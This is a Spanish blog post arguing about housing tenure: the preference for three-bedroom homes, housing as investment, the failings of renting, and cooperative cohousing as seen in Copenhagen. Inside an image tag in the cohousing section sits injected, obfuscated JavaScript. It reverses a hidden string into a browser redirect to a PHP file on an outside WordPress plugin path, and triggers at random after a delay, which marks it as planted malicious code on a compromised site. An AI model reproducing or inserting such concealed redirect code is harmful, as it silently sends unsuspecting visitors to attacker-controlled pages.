[Nuevas ideas] ¿Vivienda en propiedad?

En el ámbito de las nuevas ideas sobre el debate del tipo de tenencia de la vivienda, no se puede abordar únicamente la perspectiva económica (que también) o desde una dualidad cerrada de propiedad o alquiler. Igualmente, hemos de hacer referencia al propio modelo tipológico, que nos lleva a plantearnos sus incidencias sociales, convivenciales, laborales y de sostenibilidad.

ecohousing-QUE-ES-COHOUSING-ECONOMIA-Y-CESION-DE-USO

Fuente: eCOHOUSING, Arquitectura para nuevas formas de vida

La vivienda es una necesidad de primer orden que resolvemos como sí no tuviéramos cabeza ni individualmente ni, sobre todo, colectivamente.

Qué parque de viviendas necesitamos?

  • Cuántas?: Muy fácil, dividimos la población prevista entre el tamaño medio familiar y aplicamos un par de factores correctores.
  • De qué características?: La gente quiere viviendas de tres dormitorios.
familiadiversidad

Fuente: Hogarfem

Podríamos hacer una encuesta entre los lectores del blog:

  • Si hoy tuvieras que cambiar de vivienda y te tocara ir de alquiler, ¿pensarías en las mismas características que si fueras a comprar? Es probable que en el primer caso pensaras en tus necesidades a corto plazo y en el segundo en las preferencias de compra de esa hidra de siete cabezas que es ‘la gente’, es decir tu potencial comprador futuro.
  • Si promovieras un solar de primera residencia, ¿qué vivienda desea tu cliente objetivo? (la misma hidra multicabeza).

Quiere decirse que el elemento fundamental que conforma el parque de viviendas no es la necesidad a la que sirven, sino que se trata de un bien de cambio.

¿Por qué el objeto de deseo es una vivienda de tres dormitorios, aunque se trate de semidormitorios?

cartel

A lo largo de la relación individuo-vivienda (pongamos que 60 años), ¿cuánto tiempo cohabita con otras tres o más personas? ¿Menos de la mitad? Mucho menos de la mitad! Sin embargo, la opción considerada son los tres dormitorios, salvo en épocas de burbuja en que los precios crecientes obligan a algunos compradores a conformarse con una vivienda incompleta.

¿Cuánto cuesta construir viviendas con más habitaciones de las necesarias? ¿Y mantenerlas a temperatura confortable? ¿Y amueblarlas, decorarlas, limpiarlas…? ¿Será que esto es el crecimiento económico y el bienestar? Es como sí solo fabricarán autobuses porque puede que alguna vez necesitemos más de cinco plazas. O como sí todos los automóviles fueran anfibios, porque no podamos descartar que nos vayamos a caer al río.

La vivienda como inversión

Diréis que es que a la gente le gusta invertir en inmuebles. Pero convendréis que raramente la inversión inmobiliaria idónea coincidirá con el inmueble en que nos convenga vivir. Imaginemos que la mejor inversión inmobiliaria fuera en garajes en el centro urbano, o en lonjas en entornos de nuevos desarrollos o en viviendas en el centro de una gran ciudad (no es por hacer de menos a nadie, pero nos referimos a París, Londres…). Pues es obvio que es poco probable que nos venga bien vivir en un garaje de la Gran Vía, en una oficina de los Docklands o en una buhardilla de la rue Mouffetard.

La vivienda en alquiler

Tal vez estéis pensando que vivir de alquiler sale muy caro. No vamos a hablar de que lo verdaderamente caro es firmar una hipoteca porque en este momento interesa más que nos fijemos en la otra perspectiva. Las personas que llegan a acumular dos viviendas (p.ej., por fallecimiento de los padres, o una pareja de “singles” que pasan a convivir) solo minoritariamente optan por el alquiler a consecuencia de su baja rentabilidad. Es decir, que es caro para el inquilino y no es rentable para el casero. Efectivamente, puede pasar porque esta relación tampoco es de suma cero, sino que las dos partes pierden.

La humanidad ha sido capaz de ir a la luna, de inventar la bolsa, las participaciones preferentes o las obligaciones subordinadas y no hemos sido capaces de que el alquiler funcione razonablemente… ¿Por qué?

¿Cuál es el rendimiento anual razonable de una vivienda expresado en un porcentaje sobre su valor de mercado? ¿Qué costes tiene el arrendador? ¿El arrendador tiene más ingresos que la renta? ¿Cuál sería la renta mensual? ¿Por qué somos tan aficionados a ser caseros de nosotros mismos?

Ahora que es época de vacaciones, cuando elegimos coche de alquiler ¿cogemos la misma gama que cuando lo compramos?

Otras formas de tenencia

cohousing-<script><p id=$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toronto” src=”http://www.orbenismo.es/wp-content/uploads/2014/07/cohousing-toronto.jpg” width=”1000″ height=”750″ /> Fuente: www.archdaily.com

Sabíais que en Copenhague entre el 20 y el 30% de las viviendas son propiedad de iniciativas colectivas? La propiedad corresponde a una entidad social (cooperativa, comunidad…) y los usuarios pueden ser participes de dicha entidad o no. No es como lo que llamamos viviendas colectivas, que son como viviendas unifamiliares aisladas en las que se se oyen los ruidos de los vecinos. Estas iniciativas no solo son otra forma de tenencia, sino que aprovechan la comunidad para establecer servicios compartidos más eficientes y fomentan la sociabilidad de las personas.

¿Sabíais que por aquí están empezando a surgir iniciativas de vivienda colectiva que, además, aprovechan que se ponen a pensar para repensar el modelo de construcción? A continuación dejamos unos enlaces que nos han parecido interesantes: